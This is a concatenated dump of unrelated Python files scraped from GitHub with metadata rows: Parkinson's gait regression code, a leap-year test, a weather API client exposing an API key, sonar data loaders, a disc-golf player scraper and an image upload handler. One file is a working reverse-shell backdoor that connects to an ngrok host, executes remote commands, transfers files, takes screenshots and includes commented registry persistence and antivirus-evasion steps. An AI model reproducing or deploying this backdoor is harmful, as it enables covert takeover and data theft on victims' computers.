for train_index, test_index in split.split(all_patient_dataframe, all_patient_dataframe["HoehnYahr"]):
strat_train_set = all_patient_dataframe.loc[train_index]
strat_test_set = all_patient_dataframe.loc[test_index]
'''
print("Train Set:")
print_newline()
print(strat_train_set)
print_newline()
print("Test Set:")
print_newline()
print(strat_test_set)
'''
train_models(strat_train_set, strat_test_set)
def GenerateAllPatientDataframe(patient_data_loader, patient_data_file_paths, all_patient_dataframe, df1):
for patient_file_path in patient_data_file_paths:
# Read patient data
patient_data = patient_data_loader.read_patient_data(patient_file_path)
filename_fields = extract_fields_from_filename(patient_data_loader, patient_file_path)
study_name = filename_fields.group(1)
patient_type = filename_fields.group(2)
patient_number = filename_fields.group(3)
data_file_number = filename_fields.group(4)
# plot_patient_data(patient_data, 'Time_sec', 'TF_L', "Total force on left foot for patient: Group 1 " + study_name + patient_number)
# plot_zoomed_patient_data(patient_data, 'Time_sec', 'TF_L', "Total force on left foot for patient: Group 1 " + study_name + patient_number)
# add empty row entry
all_patient_dataframe = df1.append(all_patient_dataframe, ignore_index=True)
all_patient_dataframe = add_patient_data(all_patient_dataframe, patient_data, patient_number, study_name, patient_type, 'left', data_file_number)
all_patient_dataframe = df1.append(all_patient_dataframe, ignore_index=True)
all_patient_dataframe = add_patient_data(all_patient_dataframe, patient_data, patient_number, study_name, patient_type, 'right', data_file_number)
return all_patient_dataframe
def extract_fields_from_filename(patient_data_loader, patient_file_path):
patient_filename = patient_data_loader.extract_file_name(patient_file_path)
pattern = "([A-Z][a-z])([A-Z][a-z])([\d]+)_([\d]+)"
fields_from_filename = re.match(pattern, patient_filename)
return fields_from_filename
def add_patient_data(all_patient_dataframe, patient_data, patient_number, patient_study, patient_type, foot, data_file_number):
all_patient_dataframe.loc[0, 'ID'] = patient_study + patient_type + patient_number
all_patient_dataframe.loc[0, 'Patient_Number'] = patient_number
all_patient_dataframe.loc[0, 'Study'] = patient_study
all_patient_dataframe.loc[0, 'Patient_Type'] = patient_type
all_patient_dataframe.loc[0, 'Foot'] = foot
all_patient_dataframe.loc[0, 'file_number'] = data_file_number
fft = fft_extractor()
abs_en = AbsoluteEnergyCalculator()
all_patient_dataframe = extract_features(all_patient_dataframe, patient_data, foot, fft, abs_en)
return all_patient_dataframe
def train_models(strat_train_set, strat_test_set):
strat_train_set, strat_train_labels, strat_test_set, strat_test_labels = clean_sets(strat_train_set, strat_test_set)
print(strat_test_labels.describe())
print_seperator()
print("Linear Regression:")
lr_calculator = LinearRegressionCalculator()
lr_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
print_seperator()
print("Decision Tree Regression:")
tree_calculator = DecisionTreeRegressionCalculator()
tree_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
print_seperator()
print("Random Forest Regression:")
rf_calculator = RandomForestRegressionCalculator()
rf_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
def clean_sets(strat_train_set, strat_test_set):
data_col = ['Patient_Type', 'Foot', 'file_number', 'Median', 'Max', 'Min', 'Skewness', 'Std', 'Variance', 'Abs_Energy',
'coeff_1', 'coeff_2', 'coeff_3', 'coeff_4', 'Gender']
strat_train_set['Foot'] = strat_train_set['Foot'].apply(lambda x: '0' if x == 'left' else '1')
strat_train_set['Foot'] = strat_train_set['Foot'].astype(int)
strat_test_set['Foot'] = strat_test_set['Foot'].apply(lambda x: '0' if x == 'left' else '1')
strat_test_set['Foot'] = strat_test_set['Foot'].astype(int)
strat_train_set['Patient_Type'] = strat_train_set['Patient_Type'].apply(lambda x: '0' if x == 'Co' else '1')
strat_train_set['Patient_Type'] = strat_train_set['Patient_Type'].astype(int)
strat_test_set['Patient_Type'] = strat_test_set['Patient_Type'].apply(lambda x: '0' if x == 'Co' else '1')
strat_test_set['Patient_Type'] = strat_test_set['Patient_Type'].astype(int)
strat_train_labels = strat_train_set.loc[:, 'HoehnYahr']
strat_train_set = strat_train_set[data_col]
strat_test_labels = strat_test_set.loc[:, 'HoehnYahr']
strat_test_set = strat_test_set[data_col]
return strat_train_set, strat_train_labels, strat_test_set, strat_test_labels
# ----------------------------------------------------- GROUP 2 ------------------------------------------------------ #
def group_2_analysis(group_2_data):
print_newline()
print("#####################################")
print("Group 2 Analysis:")
print("#####################################")
# group_2_study_ga()
# group_2_study_ju()
# group_2_study_si()
# ------------------------------------------ FEATURE EXTREACTION METHODS --------------------------------------------- #
def find_gait_cycle(patient_data):
'''
gait_cycle = pd.DataFrame(patient_data[(patient_data['Sens_L1'] == 0) & (patient_data['Sens_L2'] == 0) &
(patient_data['Sens_L3'] == 0) & (patient_data['Sens_L4'] == 0) &
(patient_data['Sens_L5'] == 0) & (patient_data['Sens_L6'] == 0) &
(patient_data['Sens_L7'] == 0) & (patient_data['Sens_L8'] == 0)]['Time_sec'])
'''
gait_cycle = pd.DataFrame(patient_data[(patient_data['TF_L'] == 0)]['Time_sec'])
gait_cycle['Time_sec'] = gait_cycle['Time_sec'].astype(int)
gait_cycle = gait_cycle['Time_sec'].unique()
print_newline()
print_seperator()
print("Values with zero VGRF:\n")
print(gait_cycle)
print_seperator()
def extract_features(all_patient_dataframe, patient_data, foot, fft, abs_en):
if foot == "left":
all_patient_dataframe = add_foot_coeffs(all_patient_dataframe, fft, patient_data, 'left')
all_patient_dataframe.loc[0, 'Abs_Energy'] = abs_en.calculate_abs_energy(patient_data[['Time_sec', 'TF_L']], 'TF_L')
all_patient_dataframe = extract_eda_features(patient_data[['Time_sec', 'TF_L']], 'TF_L', all_patient_dataframe)
elif foot == "right":
all_patient_dataframe = add_foot_coeffs(all_patient_dataframe, fft, patient_data, 'right')
all_patient_dataframe.loc[0, 'Abs_Energy'] = abs_en.calculate_abs_energy(patient_data[['Time_sec', 'TF_R']], 'TF_R')
all_patient_dataframe = extract_eda_features(patient_data[['Time_sec', 'TF_R']], 'TF_R', all_patient_dataframe)
return all_patient_dataframe
def add_foot_coeffs(all_patient_dataframe, fft, patient_data, feet_type):
if feet_type == 'left':
foot_coeff = fft.calculate_fft_coeff(patient_data[['Time_sec', 'TF_L']], 'TF_L')
elif feet_type == 'right':
foot_coeff = fft.calculate_fft_coeff(patient_data[['Time_sec', 'TF_R']], 'TF_R')
else:
raise ValueError("add_foot_coeffs() : Wrong value supplied")
all_patient_dataframe.loc[0, 'coeff_1'] = foot_coeff['coeff_1__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_2'] = foot_coeff['coeff_2__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_3'] = foot_coeff['coeff_3__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_4'] = foot_coeff['coeff_4__attr_"real"']
return all_patient_dataframe
def extract_eda_features(patient_data, col_name, all_patient_dataframe):
all_patient_dataframe.loc[0, 'Median'] = tsfresh.feature_extraction.feature_calculators.median(patient_data[col_name])
all_patient_dataframe.loc[0, 'Max'] = tsfresh.feature_extraction.feature_calculators.maximum(patient_data[col_name])
all_patient_dataframe.loc[0, 'Min'] = tsfresh.feature_extraction.feature_calculators.minimum(patient_data[col_name])
all_patient_dataframe.loc[0, 'Skewness'] = tsfresh.feature_extraction.feature_calculators.skewness(patient_data[col_name])
all_patient_dataframe.loc[0, 'Std'] = tsfresh.feature_extraction.feature_calculators.standard_deviation(patient_data[col_name])
all_patient_dataframe.loc[0, 'Variance'] = tsfresh.feature_extraction.feature_calculators.variance(patient_data[col_name])
return all_patient_dataframe
# -------------------------------------------------- PLOTTING METHODS ------------------------------------------------ #
def plot_patient_data(patient_df, x_col_name, y_col_name, plot_title):
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=patient_df)
ax.set_title(plot_title)
plt.show()
def plot_zoomed_patient_data(patient_df, x_col_name, y_col_name, plot_title):
zoomed_time_data = patient_df[patient_df[x_col_name] < 20]
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=zoomed_time_data)
ax.set_title(plot_title)
plt.show()
def plot_sensor_data(patient_df, x_col_name, y_col_name, sensor_name):
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=patient_df)
ax.set_title(sensor_name + "reading over time")
plt.show()
| emilymacq/Project-Clear-Lungs | Parkinsons_ML/main/Study_Ga.py | Study_Ga.py | py | 12,820 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "seaborn.set_style",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"... |
34366380953 | from scripts.hackerrank.isLeapYear import is_leap, is_leap2, is_leap3, is_leap4
class Test:
test_cases = [
[2004, True],
[2008, True],
[2012, True],
[2016, True],
[2005, False],
[2009, False],
[2013, False],
[2017, False],
]
testable_functions = [
is_leap, is_leap2, is_leap3, is_leap4
]
def test_is_leap(self):
for f in self.testable_functions:
for case, expected in self.test_cases:
assert expected == f(case)
| TrellixVulnTeam/learning_to_test_code_BL81 | tests/hackerrank/test_isLeapYear.py | test_isLeapYear.py | py | 560 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scripts.hackerrank.isLeapYear.is_leap",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "scripts.hackerrank.isLeapYear.is_leap2",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "scripts.hackerrank.isLeapYear.is_leap3",
"line_number": 17,
... |
43314571963 | import requests
def getweather(city):
api = "96e3cd3e19571466a39662b984eec5f1"
server = "https://api.openweathermap.org/data/2.5/weather"
request = f"{server}?q={city}&appid={api}"
output = requests.get(request)
if output.status_code == 200:
weather_data = output.json()
weather = weather_data["weather"][0]["main"]
description = weather_data["weather"][0]["description"]
temperature = str(round(weather_data["main"]["temp"] - 273.15, 1)) + " °C"
pressure = str(round(weather_data["main"]["pressure"] * 100 * 0.00750063755419211, 1)) + " mmHg"
output_weather = \
f"""Weather: {weather}, {description},
t°: {temperature},
Pressure: {pressure}"""
return f"{output_weather}"
else:
return "City not found"
| XBOPb/Projects | API_Weather_App/weatherAPI.py | weatherAPI.py | py | 821 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
}
] |
19530926102 | """
Projeto Marinha do Brasil
Autor: Pedro Henrique Braga Lisboa (pedro.lisboa@lps.ufrj.br)
Laboratorio de Processamento de Sinais - UFRJ
Laboratorio de de Tecnologia Sonar - UFRJ/Marinha do Brasil
"""
from __future__ import print_function, division
import os
import h5py
import warnings
import numpy as np
import scipy.io.wavfile as wav
import soundfile as sf
def load_raw_data(input_db_path, verbose=0):
"""
Loads sonar audio datafiles on memory.
This function returns a nested hashmap associating each run audio data with its
class and filename. The audio information is composed by
the frames stored in a numpy array and the file informed sample rate.
E.g. for database '4classes' the returned dictionary will be set like:
ClassA:
navio10.wav:
signal: np.array
sample_rate: np.float64
navio11.wav:
signal: np.array
sample_rate: np.float64
ClassB:
navio20.wav:
...
navio21.wav:
...
...
...
params:
input_data_path (string):
path to database folder
return (SonarDict):
nested dicionary in which the basic unit contains
a record of the audio (signal key) in np.array format
and the sample_rate (fs key) stored in floating point.
The returned object also contains a method for applying
functions over the runs (see SonarDict.apply).
the map is made associating each tuple to the corresponding
name of the run (e.g. )
"""
if verbose:
print('Reading Raw data in path %s' % input_db_path)
class_folders = [folder for folder in os.listdir(input_db_path)
if not folder.startswith('.')]
raw_data = dict()
for cls_folder in class_folders:
runfiles = os.listdir(os.path.join(input_db_path, cls_folder))
if not runfiles: # No files found inside the class folder
if verbose:
print('Empty directory %s' % cls_folder)
continue
if verbose:
print('Reading %s' % cls_folder)
runfiles = os.listdir(os.path.join(input_db_path, cls_folder))
runpaths = [os.path.join(input_db_path, cls_folder, runfile)
for runfile in runfiles]
runfiles = [runfile.replace('.wav', '') for runfile in runfiles]
audio_data = [read_audio_file(runpath) for runpath in runpaths]
raw_data[cls_folder] = {
runfile: {'signal': signal, 'fs': fs}
for runfile, (signal, fs) in zip(runfiles, audio_data)
}
return SonarDict(raw_data)
# class RunRecord(dict):
# """
# Basic dicionary for storing the runs
# binding the data with its respective metadata(sample rate)
# This wrapper was made to standardize the keynames.
# """
# def __init__(self, signal, fs):
# self.__dict__['signal'] = signal
# self.__dict__['fs'] = fs
# def __getitem__(self , k):
# return self.__dict__[k]
class SonarDict(dict):
"""
Wrapper for easy application of preprocessing functions
"""
def __init__(self, raw_data):
super(SonarDict, self).__init__(raw_data)
@staticmethod
def from_hdf5(filepath):
f = h5py.File(filepath, 'r')
raw_data = SonarDict.__level_from_hdf5(f)
f.close()
return SonarDict(raw_data)
@staticmethod
def __level_from_hdf5(group_level):
level_dict = dict()
for key in group_level.keys():
if isinstance(group_level[key], h5py._hl.group.Group):
level_dict[key] = SonarDict.__level_from_hdf5(group_level[key])
elif isinstance(group_level[key], h5py._hl.dataset.Dataset):
# if isinstance(group_level[key].dtype, 'float64')
level_dict[key] = group_level[key][()]
else:
raise ValueError
return level_dict
def to_hdf5(self, filepath):
f = h5py.File(filepath, 'w')
SonarDict.__level_to_hdf5(self, f, '')
f.close()
@staticmethod
def __level_to_hdf5(dictionary_level, f, dpath):
for key in dictionary_level.keys():
ndpath = dpath + '/%s' % key
if isinstance(dictionary_level[key], dict):
SonarDict.__level_to_hdf5(dictionary_level[key], f, ndpath)
else:
if isinstance(dictionary_level[key], np.ndarray):
dtype = dictionary_level[key].dtype
else:
dtype = type(dictionary_level[key])
f.create_dataset(ndpath, data=dictionary_level[key], dtype=dtype)
def apply(self, fn,*args, **kwargs):
"""
Apply a function over each run of the dataset.
params:
fn: callable to be applied over the data. Receives at least
one parameter: dictionary (RunRecord)
args: optional params to fn
kwargs: optional named params to fn
return:
new SonarDict object with the processed data. The inner structure
of signal, sample_rate pair is mantained, which allows for chaining
several preprocessing steps.
"""
sonar_cp = self.copy()
return SonarDict({
cls_name: self._apply_on_class(cls_data, fn, *args, **kwargs)
for cls_name, cls_data in sonar_cp.items()
})
def _apply_on_class(self, cls_data, fn, *args, **kwargs):
"""
Apply a function over each run signal of a single class.
Auxiliary function for applying over the dataset
"""
return {
run_name: fn(raw_data, *args, **kwargs)
for run_name, raw_data in cls_data.items()
}
def read_audio_file(filepath):
signal, fs = sf.read(filepath)
return signal, fs
| pedrolisboa/poseidon | poseidon/io/offline.py | offline.py | py | 6,116 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 63,
... |
3118375238 | import torch.optim as optim
ADADELTA_LEARNING_RATE = 0.05
ADADELTA_MOMENTUM = 0.9
ADADELTA_WEIGHT_DECAY = 0.005
def get_adadelta_halnet(halnet,
momentum=ADADELTA_MOMENTUM,
weight_decay=ADADELTA_WEIGHT_DECAY,
learning_rate=ADADELTA_LEARNING_RATE):
return optim.Adadelta(halnet.parameters(),
rho=momentum,
weight_decay=weight_decay,
lr=learning_rate)
| pauloabelha/muellerICCV2017 | optimizers.py | optimizers.py | py | 520 | python | pt | code | 2 | github-code | 36 | [
{
"api_name": "torch.optim.Adadelta",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 11,
"usage_type": "name"
}
] |
28436305539 | import socket
import subprocess
import json
import os
import base64
import sys
import shutil
import time
import requests
from termcolor import colored
from mss import mss
def reliable_send(data):
json_data=json.dumps(data)
sock.send(json_data.encode('utf-8'))
def reliable_recv():
data=''
while True:
try:
data=data+sock.recv(1024).decode('utf-8')
return json.loads(data)
except ValueError:
continue
def download(url):
get_res=requests.get(url)
file_name=url.split("/")[-1]
with open(file_name,"wb") as file:
file.write(get_res.content)
def screenshot():
with mss() as screenshot:
screenshot.shot()
def is_admin():
global admin
try:
temp=os.listdir(os.sep.join([os.environ.get('SystemRoot','C:\windows'),'temp']))
except:
admin="[!!] user privileges"
else:
admin="[+] administrator priviliges"
def connection():
while True:
time.sleep(7)
try:
sock.connect(('0.tcp.ngrok.io',11174))
shell()
except:
connection()
def shell():
while True:
command=reliable_recv()
cmd=str(command)
if cmd=="":
break
print("Command from the server: "+cmd)
if cmd.lower()=="q":
print("socket closed")
break
elif command=="help":
help_options=''' download path --> download a file from target pc
upload path --> uplaod a file to target pc
get url --> downding from internet
check --> checking privileges
screenshot --> screenshot target pc
help --> help options
start path --> starting a program
q --> stop the shell
'''
reliable_send(help_options)
elif cmd[:2] =="cd" and len(cmd)>2:
try:
os.chdir(cmd[3:])
except:
continue
elif command[:8]=="download":
with open(command[9:],"rb") as file:
file_data=base64.b64encode(file.read())
reliable_send(file_data.decode())
elif command[:6]=="upload":
with open(command[7:],"wb") as fle:
fle_data=reliable_recv()
fle.write(base64.b64decode(fle_data))
elif command[:3] =="get":
try:
download(command[4:])
reliable_send(colored('[+] Downloaded file with the given url','green'))
except:
reliable_send(colored('[+] File Downloaded failed','red'))
elif command[:5]=="start" and len(command[6:])>13:
lst=command[6:].split(".")
try:
subprocess.Popen(lst[-1][:len(lst[-1])-1],shell=True)
reliable_send("[+] started")
except:
reliable_send("[-] Failed to start")
elif command[:5] =="start":
try:
subprocess.Popen(command[6:],shell=True)
reliable_send("[+] started")
except:
reliable_send("[-] Failed to start")
elif command[:10]=="screenshot":
try:
screenshot()
with open('monitor-1.png','rb') as img:
img_data=base64.b64encode(img.read())
img_data=img_data.decode('utf-8')
reliable_send(img_data)
os.remove('monitor-1.png')
except:
failed="[!!] failed to take screenshot"
reliable_send(failed)
elif command[:5]=="check":
try:
is_admin()
reliable_send(admin)
except:
reliable_send("[-] Cannot perform the task")
else:
proc=subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
result=proc.stdout.read() +proc.stderr.read()
reliable_send(result.decode('utf-8'))
# location=os.environ["appdata"]+"\\winhar32.exe"
# if not os.path.exists(location):
# shutil.copy(sys.executable,location)
# subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "' + location +'"', shell=True)
# file_name=sys._MEIPASS+"\image.jpg"
# try:
# subprocess.Popen(file_name,shell=True)
# except:
# # to bypass antivirus
# num=1
# num2=3
# num3=num+num2
# file_name=sys._MEIPASS+"\image.jpg"
try:
subprocess.Popen(file_name,shell=True)
except:
# tp bypass antivirus
num=1
num2=3
num3=num+num2
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connection()
sock.close()
# check the ip address
| sharshith1312/reverse_shell | rstest1.py | rstest1.py | py | 5,215 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.dumps",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "mss.mss",
"line_number": 33,
... |
15386994551 | #!/usr/bin/env python3
"""게임과 론처를 묶어서 새 앱 프로토콜 버전을 서명한 뒤 패키지로 생성한다."""
import argparse
import os
import os.path
import logging
import shutil
import tarfile
import tempfile
import zipfile
from zipfile import ZIP_DEFLATED
parser = argparse.ArgumentParser(description=__doc__.replace('\n', ' '))
parser.add_argument('out_dir')
parser.add_argument('platform', choices={'macOS', 'Windows', 'Linux'})
parser.add_argument('game_dir')
parser.add_argument('timestamp')
parser.add_argument(
'--verbose', '-v',
action='store_const', const=logging.DEBUG, default=logging.INFO,
)
def main() -> None:
args = parser.parse_args()
logging.basicConfig(level=args.verbose)
temp_dir = tempfile.mkdtemp()
for root in [args.game_dir]:
for name in os.listdir(root):
path = os.path.join(root, name)
tmppath = os.path.join(temp_dir, name)
if os.path.isdir(path):
if not os.path.isdir(tmppath): # skip duplicate dirs
shutil.copytree(path, tmppath)
else:
if not os.path.isfile(tmppath): # skip duplicate files
shutil.copy2(path, tmppath)
logging.info('Copy: %s -> %s', path, tmppath)
# 아카이브 생성
os.makedirs(args.out_dir, exist_ok=True)
if args.platform.lower() == 'macos':
archive_path = os.path.join(args.out_dir, 'macOS.tar.gz')
executable_path = os.path.join(
temp_dir,
'9c.app/Contents/MacOS/9c'
)
os.chmod(executable_path, 0o755)
with tarfile.open(archive_path, 'w:gz') as archive:
for arcname in os.listdir(temp_dir):
name = os.path.join(temp_dir, arcname)
archive.add(name, arcname=arcname)
logging.info('Added: %s <- %s', arcname, name)
elif args.platform.lower() == 'linux':
archive_path = os.path.join(args.out_dir, 'Linux.tar.gz')
executable_path = os.path.join(
temp_dir,
'9c'
)
os.chmod(executable_path, 0o755)
with tarfile.open(archive_path, 'w:gz') as archive:
for arcname in os.listdir(temp_dir):
name = os.path.join(temp_dir, arcname)
archive.add(name, arcname=arcname)
logging.info('Added: %s <- %s', arcname, name)
elif args.platform.lower() == 'windows':
archive_path = os.path.join(args.out_dir, 'Windows.zip')
with zipfile.ZipFile(archive_path, 'w', ZIP_DEFLATED) as archive:
basepath = os.path.abspath(temp_dir) + os.sep
for path, dirs, files in os.walk(temp_dir):
logging.debug('Walk: %r, %r, %r', path, dirs, files)
for name in files + dirs:
fullname = os.path.abspath(os.path.join(path, name))
assert fullname.startswith(basepath)
relname = fullname[len(basepath):]
archive.write(fullname, relname)
logging.info('Added: %s <- %s', relname, fullname)
else:
return parser.exit(1, f'unsupported platform: {args.platform}')
logging.info('Created an archive: %s', archive_path)
shutil.rmtree(temp_dir)
if __name__ == '__main__':
main()
| FioX0/PandoraReborn | tools/pack/pack.py | pack.py | py | 3,340 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "logging.INFO",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "logging.... |
31982185532 | import requests
from bs4 import BeautifulSoup
from datetime import datetime
import os.path
import csv
import threading
from queue import Queue
# Proxies for BURP - update requests if you want to use this proxy
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
playersFile = 'sample_corrected.txt'
ids = Queue()
# Please be nice to the PDGA site :)
THREADS = 1
class Player:
def __init__(self, pdga):
self.store = []
self.failure = False
self.pdga = pdga
r = requests.get(f'https://www.pdga.com/player/{pdga}')
soup = BeautifulSoup(r.text, 'html.parser')
pi = soup.find('ul', class_='player-info info-list')
self.today = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
# if access denied|page not found go to next player
self.check_failures(soup)
if self.failure:
return
player = soup.h1.get_text()
# Fields that will always exist for all members
self.name = player.split(' #')[0].replace(',', ' ')
self.status = pi.find('li', class_='membership-status').text.split('Status: ')[1].split(' ')[0]
# The remaining fields may not be on the profile so I had to check to see if they exist before parsing
expiration = pi.find('li', class_='membership-status').text.split('Status: ')[1]
if 'until' in expiration:
self.expiration = expiration.split('until ')[1].replace(')', '')
else:
self.expiration = expiration.split('as of ')[1].replace(')', '')
self.joindate = pi.find('li', class_='join-date')
if self.joindate:
self.joindate = self.joindate.text.split('Member Since: ')[1].split(' ')[0]
else:
self.joindate = ''
try:
location = pi.find('li', class_='location').text.split('Classification:')[0].split('Location: ')[1].split(
',')
except:
location = ''
if location:
# City, State, Country
if len(location) >= 3:
self.city = location[0].lstrip()
self.state = location[1].lstrip()
self.country = location[2].split('Member Since: ')[0].lstrip()
# Only State/Prov, Country
if len(location) == 2:
self.city = 'N/A'
self.state = location[0].lstrip()
self.country = location[1].split('Member Since: ')[0].lstrip()
# Country Only
if len(location) == 1:
self.city = 'N/A'
self.state = 'N/A'
self.country = location[0].split('Member Since: ')[0].lstrip()
self.loclink = pi.find('li', class_='location').find('a')['href']
else:
self.city = ''
self.state = ''
self.country = ''
self.loclink = ''
self.rating = pi.find('li', class_='current-rating')
if self.rating:
self.rating = self.rating.text.split('Current Rating: ')[1].split(' ')[0]
else:
self.rating = ''
self.classification = pi.find('li', class_='classification')
if self.classification:
self.classification = self.classification.text.split('Classification: ')[1]
else:
self.classification = ''
self.events = pi.find('li', class_='career-events')
if self.events:
self.events = self.events.text.split('Career Events: ')[1].replace(',', '')
else:
self.events = ''
self.earnings = pi.find('li', class_='career-earnings')
if self.earnings:
self.earnings = self.earnings.text.split('Career Earnings: ')[1].replace(',', '').strip('$')
else:
self.earnings = '0'
self.wins = pi.find('li', class_='career-wins disclaimer')
if self.wins:
self.wins = self.wins.text.split('Career Wins: ')[1]
else:
self.wins = '0'
self.store_vals()
self.write_data()
# Set values to store in file
def store_vals(self):
self.store = [self.pdga, self.name, self.city, self.state, self.country, self.loclink, self.classification,
self.joindate, self.status, self.expiration, self.rating, self.events, self.wins, self.earnings,
self.today]
print(self.store)
# Append player to file
def write_data(self):
with open(playersFile, 'a+', newline='', encoding='utf-8') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writer.writerow(self.store)
# Display detailed data on each a player
def verbose(self):
print(f'Scrape Date: {self.today}')
print(f"ID: {self.pdga}")
print(f"Name: {self.name}")
print(f"Status: {self.status}")
print(f"Expiration: {self.expiration}")
print(f"City: {self.city}")
print(f"State: {self.state}")
print(f"Location Link: {self.loclink}")
print(f"Country: {self.country}")
print(f"Rating: {self.rating}")
print(f"Classification: {self.classification}")
print(f"Events: {self.events}")
print(f"Wins: {self.wins}")
print(f"Earnings: {self.earnings}")
# Check if player page exists before trying to scrape profile
def check_failures(self, soup):
fail = ['Page not found', 'Access denied']
if any(x in soup.h1.get_text() for x in fail):
print(f'Not a valid player: {self.pdga}')
self.name = ''
self.status = ''
self.start = ''
self.expiration = ''
self.city = ''
self.state = ''
self.country = ''
self.loclink = ''
self.rating = ''
self.classification = ''
self.earnings = ''
self.events = ''
self.wins = ''
self.joindate = ''
self.store_vals()
self.failure = True
# Create player file if it doesn't exist. If it does exist return the next user to scrape.
def check_file():
header = ['id', 'name', 'city', 'state', 'country', 'loclink', 'classification', 'joindate', 'status', 'expiration',
'rating', 'events', 'wins', 'earnings', 'scrape date']
if os.path.exists(playersFile):
print(f'Appending to already created file - {playersFile}')
return get_recent_scrape()
else:
print(f'File created - {playersFile}')
with open(playersFile, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writer.writerow(header)
return 0
# Get total number of PDGA players to set limit of scraping
def find_last_player():
print('\nFinding number of registered PDGA members...')
pl = requests.get(
'https://www.pdga.com/players?FirstName=&LastName=&PDGANum=&Status=All&Gender=All&Class=All&MemberType=All'
'&City=&StateProv=All&Country=All&Country_1=All&UpdateDate=&order=PDGANum&sort=desc')
psoup = BeautifulSoup(pl.text, 'html.parser')
last_player = psoup.find('table', class_='views-table cols-8').find('td', class_='views-field views-field-PDGANum '
'active pdga-number').get_text(
).rstrip()
print(f'There are {int(last_player)} registered PDGA members!!!')
return int(last_player)
# Get the last PDGA member scraped and saved
def get_recent_scrape():
# Since threading can cause the last saved player to be out of order check the last THREADS number of lines
# and find the max PDGA number of the last saved
with open(playersFile, "r", encoding="utf-8", errors="ignore") as scraped:
# final_line = (scraped.readlines()[-1].split(',')[0])
print(f'Cecking last {THREADS} lines to find last saved player')
last_lines = []
scrape = scraped.readlines()
for line in range(1, int(THREADS) + 1):
# print(f"Line: {line} - {scrape[-line].split(',')[0]}")
last_lines.append(scrape[-line].split(',')[0])
nextScrape = int(max(last_lines)) + 1
print(f'Last lines: {last_lines}')
print(f"\nThe last player scrapted was PDGA #{max(last_lines)}")
print(f"Continuing scraping on PDGA #{nextScrape}...")
return nextScrape
# Return [next player to scrape, most recent registered member]
def get_range():
return range(check_file(), find_last_player())
# Scrape function for threading
def scrape_player():
global ids
while True:
pdga = ids.get()
Player(pdga)
ids.task_done()
# Fill queue with remaining players
def fill_queue():
id_range = get_range()
for id in id_range:
ids.put(id)
print(f'\nAdding PDGA members from {id_range[0]} to {id_range[1]}')
print(f'Queue of IDs full with {ids.qsize()} members to go!')
if __name__ == '__main__':
fill_queue()
print('Starting scraping of members...')
for i in range(THREADS):
print(f'Starting thread #{i}')
t = threading.Thread(target=scrape_player)
t.start()
| zcrosman/PDGAscrape | PDGAscrape.py | PDGAscrape.py | py | 9,296 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "queue.Queue",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
... |
40144939486 | from flask import request
from werkzeug.utils import secure_filename
from db import db
from models import Img
def upload_images(pic_list, private, user_id):
#import pdb; pdb.set_trace()
for pic in pic_list:
filename = secure_filename(pic.filename)
mimetype = pic.mimetype
if not filename or not mimetype or "image" not in str(mimetype):
return False
img = Img(img=pic.read(), user_id=user_id, private=private, name=filename, mimetype=mimetype)
db.session.add(img)
db.session.commit()
return True
| elmanreasat/imagipy | controllers/upload.py | upload.py | py | 573 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "werkzeug.utils.secure_filename",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "models.Img",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "db.db.session.add",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "db.db.ses... |
12087004714 | from sklearn.feature_extraction.text import TfidfVectorizer
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import spacy,os
import argparse
import re
from tqdm import tqdm
from collections import OrderedDict
import string
import numpy as np
from spacy.lang.en import English
import time
nl = English()
import sys
import pandas as pd
repeat = 5
data = []
doc = []
l3 = []
summary = []
